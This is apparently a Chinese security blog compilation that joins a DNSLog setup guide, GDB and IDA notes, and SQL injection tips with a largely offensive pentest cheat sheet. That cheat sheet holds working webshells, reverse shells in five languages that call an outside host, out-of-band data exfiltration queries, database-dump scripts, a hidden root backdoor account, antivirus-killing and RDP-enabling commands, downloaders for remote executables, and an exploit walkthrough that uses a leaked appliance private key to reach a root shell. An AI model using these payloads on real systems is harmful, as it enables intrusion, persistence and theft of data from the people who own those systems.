安全技术

DNSLog,简单来说,就是通过记录对于域名的DNS请求,通过dns请求这个相对“隐蔽”的渠道,来委婉地获取到想要获得的信息。
例如,在一个针对mysql数据库的注入中,如果没有回显,可能很多时候就要歇菜。
但如果对方的数据库服务器连接公网并且是Windows机器的话,就可以用这种姿势来获取信息:

1
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM user WHERE user='root' LIMIT 1),'.nogan.ga\\xxx'))

你将会看到类似:

当然你可能会说直接用http协议传输不就好了吗,确实http协议也可以,但是http协议毕竟有局限的地方,例如容易被防火墙限制等。
而dns作为一种基础协议有时候并不会被随便禁用,一些内网当中对于DNS协议的管控和检测是个薄弱的点,相对http来说DNS协议也更加隐蔽。

近几年DNSLog被尤其广泛地运用于无回显的SQL注入、命令执行、XML实体注入等漏洞的检测当中,算是一门很基础的老技术了。

关于DNSLog的具体应用,这里就不多说了,感兴趣的可以进一步阅读以下文章:

1
2
3
4
5
https://www.anquanke.com/post/id/98096

http://www.freebuf.com/column/158579.html

https://www.cnblogs.com/afanti/p/8047530.html

那么如何低成本搭建dnslog服务器?接下来就来简要分享一个低成本构建DNSLog服务的方法。

准备材料:

(1) 一台低成本的VPS:这里推荐使用某国外的便宜VPS,完整root权限,单核512MB/10GSSD,¥128/年,购买链接在文章最后
(2) 一个可以接收邮件的邮箱:用来注册免费域名

搭建过程

注册域名

首先到 https://freenom.com 注册用户,同时注册一个免费的域名
以我这里为例,注册一个nogan.ga

注册的时候,在DNS选项中,选择使用自己的DNS,新建DNS服务器的地址,例如我这里自定义了两个dns服务器,分别是
ns0.nogan.ga和ns1.nogan.ga,并且将他们的地址指向我的VPS服务器。

点击Continue,进入到结算页面。
如果你上一步没有注册用户,那么可以直接在这里填你用来注册用户的邮箱,然后根据指引进行操作。
如果注册了用户,只需要直接登录就可以了。

进入到Review and Checkout页面,填入一些你的基本信息就可以了

这里记得勾选Lock profile,你的信息就不会被whois查询到了。

接着下一步,勾选Complate Order,域名就注册成功了。

部署DNS服务

登录你的VPS服务器,运行下面这个python脚本,将在你的VPS主机监听UDP 53端口,并且回复DNS响应包:

记得修改IP地址和NS域名,在最后。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2014-06-29 03:01:25
# @Author : Your Name ([email protected])
# @Link : http://example.org
# @Version : $Id$

import SocketServer
import struct
import socket as socketlib
# DNS Query
class SinDNSQuery:
truedef __init__(self, data):
truetruei = 1
truetrueself.name = ''
truetruewhile True:
truetruetrued = ord(data[i])
truetruetrueif d == 0:
truetruetruetruebreak;
truetruetrueif d < 32:
truetruetruetrueself.name = self.name + '.'
truetruetrueelse:
truetruetruetrueself.name = self.name + chr(d)
truetruetruei = i + 1
truetrueself.querybytes = data[0:i + 1]
truetrue(self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])
truetrueself.len = i + 5
truedef getbytes(self):
truetruereturn self.querybytes + struct.pack('>HH', self.type, self.classify)



# DNS Answer RRS
# this class is also can be use as Authority RRS or Additional RRS
class SinDNSAnswer:
truedef __init__(self, ip):
truetrueself.name = 49164
truetrueself.type = 1
truetrueself.classify = 1
truetrueself.timetolive = 190
truetrueself.datalength = 4
truetrueself.ip = ip

truedef getbytes(self):
truetrueres = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)
truetrues = self.ip.split('.')
truetrueres = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))
truetruereturn res

# DNS frame
# must initialized by a DNS query frame
class SinDNSFrame:
truedef __init__(self, data):
truetrue(self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])
truetrueself.query = SinDNSQuery(data[12:])

truedef getname(self):
truetruereturn self.query.name

truedef setip(self, ip):
truetrueself.answer = SinDNSAnswer(ip)
truetrueself.answers = 1
truetrueself.flags = 33152

truedef getbytes(self):

truetrueres = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)
truetrueres = res + self.query.getbytes()
truetrueif self.answers != 0:
truetruetrueres = res + self.answer.getbytes()
truetruereturn res

# A UDPHandler to handle DNS query
class SinDNSUDPHandler(SocketServer.BaseRequestHandler):
truedef handle(self):
truetruedata = self.request[0].strip()
truetruedns = SinDNSFrame(data)
truetruesocket = self.request[1]
truetruenamemap = SinDNSServer.namemap
truetrueif(dns.query.type==1):
truetruetrue# If this is query a A record, then response it
truetruetruename = dns.getname();
truetruetruetoip = None
truetruetrueifrom = "map"
truetruetrueif namemap.__contains__(name):
truetruetruetrue# If have record, response it
truetruetruetrue# dns.setip(namemap[name])
truetruetruetrue# socket.sendto(dns.getbytes(), self.client_address)
truetruetruetruetoip = namemap[name]
truetruetrueelif namemap.__contains__('*'):
truetruetruetrue# Response default address
truetruetruetrue# dns.setip(namemap['*'])
truetruetruetrue# socket.sendto(dns.getbytes(), self.client_address)
truetruetruetruetoip = namemap['*']
truetruetrueelse:
truetruetruetrue# ignore it
truetruetruetrue# socket.sendto(data, self.client_address)
truetruetruetrue# socket.getaddrinfo(name,0)
truetruetruetruetry:
truetruetruetruetruetoip = socketlib.getaddrinfo(name,0)[0][4][0]
truetruetruetruetrueifrom = "sev"
truetruetruetruetrue# namemap[name] = toip
truetruetruetruetrue# print socket.getaddrinfo(name,0)
truetruetruetrueexcept Exception, e:
truetruetruetruetrueprint 'get ip fail'
truetruetrueif toip:
truetruetruetruedns.setip(toip)

truetruetrueprint '%s: %s-->%s (%s)'%(self.client_address[0], name, toip, ifrom)
truetruetruesocket.sendto(dns.getbytes(), self.client_address)
truetrueelse:
truetruetrue# If this is not query a A record, ignore it
truetruetruesocket.sendto(data, self.client_address)

# DNS Server
# It only support A record query
# user it, U can create a simple DNS server
class SinDNSServer:
truedef __init__(self, port=53):
truetrueSinDNSServer.namemap = {}
truetrueself.port = port

truedef addname(self, name, ip):
truetrueSinDNSServer.namemap[name] = ip

truedef start(self):
truetrueHOST, PORT = "0.0.0.0", self.port
truetrueserver = SocketServer.UDPServer((HOST, PORT), SinDNSUDPHandler)
truetrueserver.serve_forever()

# Now, test it
if __name__ == "__main__":
truesev = SinDNSServer()
sev.addname('ns0.nogan.ga','x.x.x.x')
sev.addname('ns1.nogan.ga','x.x.x.x')
sev.addname('www.nogan.ga','y.y.y.y')
sev.addname('*', '127.0.0.1') # default address

truesev.start() # start DNS server

将上面的ns0.nogan.ga和ns1.nogan.ga改成你的域名,并且将x.x.x.x改成你的VPS服务器地址。
如果你在搭建DNSLog的同时还想顺便搭建一个网站的话,可以添加一个www记录,指向你的web服务器地址。
星号是将任意地址执行127.0.0.1,这样你的DNSLog请求记录,都会被默认解析到127.0.0.1。

接着在服务器上运行

1
python dns.py

在任意机器上面ping xxxxx.YOURDOMAIN:

可以在VPS上观察到请求已经过来了

但这个时候程序是一直在控制台运行的,想要退出怎么办呢,用nohup将程序改为背景运行:

想要关闭的话,先查看端口并获取进程号,然后kill即可:

Enjoy it~

附:

搬瓦工VPS优惠地址 (推荐 $19.99/年,约合RMB¥128):

https://bandwagonhost.com/cart.php
可能要扶梯 = =

使用GDB对GCC编译出的ELF文件进行调试。
首先在编译的时候,需要加上-g参数:
gcc -g -o test test.c -Wall
这样才能在编译的时候产生符号表,GDB才可以载入。
编译好程序以后,使用gdb test载入程序
添加断点:b 行号
运行:r
单步执行(next):n
跟踪步入(step):s
恢复执行(continue):c
打印变量值(print):p 变量名
查看断点信息:info b
列出源代码(list)l
退出:q

汇编相关:
查看汇编格式:show disassembly-flavor
将汇编格式转换成intel:set disassembly-flavor intel
将汇编格式转换成at&t:set disassembly-flavor att
显示汇编代码:disassemble 函数名

PHP相关

1
2
3
4
5
6
7
8
9
10
11
<?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?>

<?php include "$_GET['_']"; ?>

<?php assert($_POST["1"]);?>

<?php
$url = "http://x.x.x.x/shell.txt";
$contents = file_get_contents($url);
echo $contents;
?>

Mysql数据库
phpmyadmin爆路径

1
http://url/phpMyAdmin/libraries/select_lang.lib.php

SQL语句导出shell:

1
select "<?php eval($_POST['1']);?>" into outfile 'C:\www\shell.php';

Redis数据库
写shell:

1
2
3
4
config set dir D:\www
config set dbfilename shell.php
set webshell "<?php eval($_POST[x]);?>"
save

Oracle数据库
查数据库ip

1
select sys_context('userenv','ip_address') from dual

通过外连回传数据

1
SELECT UTL_HTTP.request('http://target.com/getdata?data='||TABLE_NAME) FROM USER_TABLES WHERE ROWNUM<=1

查询所有表

1
SELECT * FROM ALL_TABLES

查询当前用户表

1
select table_name from user_tables;

查询所有表按大小排序

1
2
SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES order by NUM_ROWS desc
select table_name,NUM_ROWS from user_tables order by NUM_ROWS desc

查询表前十条

1
select  *   from  users  where  rownum < 10

分页查询 2000000 到 4000000

1
SELECT * FROM (SELECT e.*,ROWNUM rn FROM (select * from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000

查询当前编码

1
select userenv('language') from dual;

命令行执行

1
export NLS_LANG="american_america.AL32UTF8"

拖库脚本

JSP1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin");
File f = new File("/webapps/ROOT/css/t1.txt");
BufferedWriter bw = new BufferedWriter(new FileWriter(f));
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
ResultSet rs=stmt.executeQuery("select * from member where rownum > 2000000");
ResultSetMetaData rsmd = rs.getMetaData();
int numberOfColumns = rsmd.getColumnCount();
for(int i=1;i<numberOfColumns+1;i++){
bw.write(rsmd.getColumnName(i)+",");
}
while (rs.next()){
for(int i=1;i<numberOfColumns+1;i++){
bw.write(rs.getString(i)+",");
}
bw.newLine();
bw.flush();
}
out.print(rs);
%>

JSP2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password");
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
String html="";
File file = new File("/tmp/data.txt");
BufferedReader br = new BufferedReader(new FileReader(file));
String line;
while ((line = br.readLine()) != null) {
html=html+"<h3>"+line+":</h3><table border=1><tr>";
ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100");
ResultSetMetaData rsmd = rs.getMetaData();
int numberOfColumns = rsmd.getColumnCount();
for(int i=1;i<numberOfColumns+1;i++){
html=html+"<th>"+rsmd.getColumnName(i)+"</th>";
}
html+="</tr>";
while (rs.next()){
html+="<tr>";
for(int i=1;i<numberOfColumns+1;i++){
html=html+"<td>"+rs.getString(i)+"</td>";
}
html+="</tr>";
}
rs.close();
html+="<tr></table>";
}
File f = new File("/tmp/info.css");
BufferedWriter bw = new BufferedWriter(new FileWriter(f));
bw.write(html);
bw.close();
br.close();
stmt.close();
conn.close();
%>

ColdFusion

1
2
3
4
5
6
7
8
9
10
11
12
13
<CFSET USERNAME="user">
<CFSET PASSWORD="pass">
<CFSET DATABASE="ya_db">
<CFTRY>
<CFQUERY NAME="DATA" DATASOURCE=#DATABASE# USERNAME=#USERNAME# PASSWORD=#PASSWORD#>
SELECT * FROM MEMBER
</CFQUERY>
<CFCATCH Type="Any"></CFCATCH>
</CFTRY>
<CFSAVECONTENT variable="Dump_DATA">
<CFDUMP var="#DATA#" EXPAND="YES" FORMAT="TEXT">
</CFSAVECONTENT>
<cffile action="write" output="#Dump_DATA#" FILE="C:\\RECYCLER\\#USERNAME#_DATA.txt">

反弹shell
bash

1
bash -i >& /dev/tcp/1.1.1.1/1234 0>&1

1
rm -f /tmp/p; mknod /tmp/p p && telnet 1.1.1.1 1234 0/tmp/p

ruby

1
ruby -rsocket -e'f=TCPSocket.open("1.1.1.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

perl

1
2
3
4
perl -e 'use Socket;$i="1.1.1.1";
$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

1
2
3
4
5
6
7
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("1.1.1.1",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

php

1
php -r '$sock=fsockopen("1.1.1.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Windows取消共享文件夹安全警告

1
2
@echo off
Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f

kill安全狗3.x

1
ntsd -c q -pn SafeDogGuardCenter.exe

其他
python Simple HTTP服务:

1
python -m SimpleHTTPServer

Linux相关技巧
压缩目录

1
2
3
zip  -r  root.zip  /root/*
tar -czvf root.tar.gz /root/
tar -cvf user/tmp/ooouser.tar user/ --exclude=image --exclude= --exclude *.jpg --exclude *.gif --exclude *.zip --exclude *.bmp --exclude *.eps --exclude *.psd

添加用户并设置密码

1
useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof

收集所有.sh .pl .py .conf .cnf .ini .history .pass* (/usr/share目录里面的除外) 并打包成zip

1
find / \! -path “/usr/share/*” -regex “.*\.sh$\|.*\.pl$\|.*\.py$\|.*\.conf$\|.*\.cnf$\|.*\.ini$\|.*\/\..*history$\|.*\/\..*pass.*” -print|zip pack.zip [email protected]

array_push 后门

1
array_map("ass\x65rt",(array)$_REQUEST['array']);

开启3389端口

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

这是一个比较老的漏洞了,但是到目前为止仍然有不少厂商在使用这个版本的设备。在渗透中也曾经遇到过。
参考自:https://www.exploit-db.com/exploits/32369/

受影响的产品有: Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances

默认用户和密码

vxAG 9.2.0.34 和 vAPV 8.3.2.17 的/etc/master.passwd 文件中包含了默认用户和密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:$1$9QkJT4Y5$lF2BPaSI2kPlcrqz89yZv0:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default
User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
test:$1$UtEw8DNY$te4MRasnXgETxWOZ9Z1o10:1002:1002::0:0:test:/export/test:/bin/tcsh
sync:$1$bmfGRJPh$lWnesbn8M8xZNo3uaqfEd1:1005:0::0:0:sync:/export/sync:/bin/sh
recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery
mfg:$1$i8SV4bKc$lNMeb8Yow.p.cZvWxt1mO1:1013:1010::0:0:mfg:/export/mfg:/bin/tcsh
arraydb:*:1015:0::0:0:User &:/home/arraydb:/bin/sh
array::1016:1011::0:0:User &:/:/ca/bin/ca_shell

破解之后可以得到下列用户和密码:

1
2
用户: mfg 密码: mfg
用户: sync 密码: click1

test和root用户没破解出来。

其中sync用户默认可以远程登录:

1
2
3
4
$ssh [email protected] /bin/sh
[email protected]'s password:
$id
uid=1005(sync) gid=0(wheel) groups=0(wheel)

SSH 私钥

sync 用户使用了位于 “~/.ssh/id_dsa” 的登录私钥:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ cat id_dsa
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
+sqSEhA35Le2kC4Y1/A=
-----END DSA PRIVATE KEY-----

下列文件位于 ~/.ssh 目录:

1
2
3
4
5
6
7
8
9
$ cat authorized_keys
1024 35
117781646131320088945310945996213112717535690524599971400605193647439008360689916421327587459429042579662784434303538942896683338584760112042194838342054595473085094045804963620754645364924583113650482968246287214031112796524662479539236259838315876244144983122361617319660444993650437402628793785173700484401
[email protected]

$ cat authorized_keys2
ssh-dss
AAAAB3NzaC1kc3MAAACBAJTDsX+8olPZeyr58g9XE0L8PKT5030NZBPlE7np4hBqx36HoWarWq1Csn8M57dWN9StKbs03k2ggY6sYJK5AW2EWar70um3pYjKQHiZq7mITmitsozFN/K7wu2e2iKRgquUwH5SuYoOJ29n7uhaILXiKZP4/H/dDudqPRSY6tJPAAAAFQDtuWH90mDbU2L/Ms2lfl/cja/wHwAAAIAMBwSHZt2ysOHCFe1WLUvdwVDHUqk3QHTskuuAnMlwMtSvCaUxSatdHahsMZ9VCHjoQUx6j+TcgRLDbMlRLnwUlb6wpniehLBFk+qakGcREqks5NxYzFTJXwROzP72jPvVgQyOZHWq81gCild/ljL7hmrduCqYwxDIz4o7U92UKQAAAIBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQOC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBg==
[email protected]

如此一来就可以使用这个私钥进入系统:

将下面的id_dsa私钥保存在”synckey”文件中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
cat > ~/synckey << EOF
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
+sqSEhA35Le2kC4Y1/A=
-----END DSA PRIVATE KEY-----
EOF

修改synckey文件的权限:

1
chmod 600 ~/synckey

使用该私钥登录系统:

1
ssh -i ~/synckey [email protected] /bin/sh

提权

/ca/bin/monitor.sh和 /ca/bin/debug_syn_stat默认是全局可写的 (权限为777).
在monitor.sh文件中写入脚本,通过debug monitor选项重新启动该脚本会以root权限运行。
使用sync用户运行/ca/bin/backend工具,使用如下方式重启debug monitor:
关闭debug monitor:

1
/ca/bin/backend -c "debug monitor off"`echo -e "\0374"`

开启debug monitor:

1
/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`

在/ca/bin/monitor.sh中写入反弹shell的指令,通过上述操作,即可反弹回一个root shell.

快捷键 作用
Alt+T 搜索文本
Ctrl+1 Quick View导航
空格键 图形视图/汇编视图切换
Shift+F3 切换到Functions窗口
Shift+F4 切换到Names窗口
Shift+F7 切换到Segments窗口
Shift+F12 切换到Strings窗口
IDA View内
Ctrl+Enter 前进(函数调用)
Esc 后退(函数调用)

MYSQL篇
1.内置函数和变量

1
@@datadir,version(),database(),user(),load_file(),outfile()

2.利用concat(),group_concat(),concat_ws()拼接查询结果
实例:

1
2
xxx.php?id=1 and 1=2 union select 1,
group_concat(username,0x3a,password),3 from user

3.使用内建数据库查询表段和字段
查表段:

1
2
3
xxx.php?id=1 and 1=2 union select 1,2,table_name from 
(select * from information_schema.tables where table_schema=数据库名的hex
order by table_schema limit 0,1)t limit 1–

查字段:

1
2
3
xxx.php?id=1 and 1=2 union select 1,2,column_name from 
(select * from information_schema.columns where table_name=表名的hex
and table_schema=数据库名hex值 order by 1 limit 1,1)t limit 1–

这里可以再结合下concat的拼接功能

1
2
3
4
xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20) 
from (select * from information_schema.columns where table_name=表名的hex
and table_schema=数据库名hex值 order by 1 limit 0,n)t limit 1–
[n表示第n条数据]

Access篇

猜表名

1
*.asp?id=1 and exists (select * from admin)

猜列名

1
*.asp?id=1 and exists (select password from admin)

Order by查询

1
*.asp?id=1 order by 3

union 查询

1
*.asp?id=1 union select 1,password,3 from admin

不支持union的情况
先判断内容的长度

1
*.asp?id=132 and (select top 1 len(user) from admin) >5

然后一个一个猜

1
*.asp?id=132 and (select top 1 asc(mid(user,1,1)) from admin)>97

例如确定asc(mid(user,1,1))的值是97,即可判断出user的第一个字符为a
确定了之后继续从第二个位置猜

1
*.asp?id=132 and (select top 1 asc(mid(user,2,1)) from admin)>97

以此类推

MSSQL篇
基于报错的MSSQL注入:
判断是否是MSSQL

1
'and exists (select * from sysobjects) --

如果返回正常,就说明是MSSQL,否则当sysobjects不存在,是会报错的。

猜表名:

1
'and exists(select * from admin)--

如果存在,会返回正常页面,否则报错,就是不存在。

Windows XP SP3
在Windows XP SP3中,关闭DEP的方法是:
编辑C:\boot.ini,你大概会看到如下内容

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" 
/noexecute=optin /fastdetect

要关闭DEP,将/noexecute=optin 改为/excute,重启系统即可。

Windows 7
Windows7中不是通过boot.ini来保护了,需要在命令行中输入bcdedit,如果观察到输出的最后一项为
nx 1
表示DEP保护是开启的,并且级别为1
只需要运行

bcdedit /set nx alwaysoff

就可以了,然后重启系统。

Downloader 1

1
2
3
4
5
6
7
8
9
10
11
12
Set args = Wscript.Arguments
Url = "http://x.x.x.x/x.exe"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile " C:\%homepath%\file", 2 '
end with

Downloader 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
GetRemoteData = .ResponseBody
End With
Set Retrieval = Nothing
Set Ads = Server.CreateObject("Adodb.Stream")
With Ads
.Type = 1
.Open
.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
.Cancel()
.Close()
End With
Set Ads = Nothing
End Sub

eWebEditor_SaveRemoteFile "c:\x.exe", "http://x.x.x.x/x.exe"
%>

1
2
3
4
5
6
7
8
@echo off 
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
ECHO "Content Type"="application/x-msdownload">>gif.reg
ECHO @="exefile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul

Get System Info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
@echo off
ipconfig /all
net start
tasklist /v
net user
net localgroup administrator
netstat -ano
net use
net view
net view /domain
net group /domain
net group "domain users" /domain
net group "domain admins" /domain
net group "domain controllers" /domain
net group "exchange domain servers" /domain
net group "exchange servers" /domain
net group "domain computers" /domain
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with atq#####
echo schtask /query
echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree -F

Get Task List

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
''''''''''''''''''''''''''''''''''''
' [email protected]
''''''''''''''''''''''''''''''''''''

On Error Resume Next
Dim obj, pross, pid, killName
pid = WScript.Arguments(1)
killName = WScript.Arguments(0)

Set obj = GetObject("Winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set pross = obj.Execquery("Select * From Win32_Process")
Wscript.echo "[PID]" & VbTab & "[ProName]"

For Each proccess In pross
If (WScript.Arguments.Count = 2) And (CStr(pid) = CStr(proccess.ProcessID)) Then
proccess.Terminate 0
ElseIf Ucase(proccess.Name) = Ucase(killName) Then
proccess.Terminate 0
Else
WScript.echo proccess.ProcessID & VbTab & proccess.Name
End If
Next

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×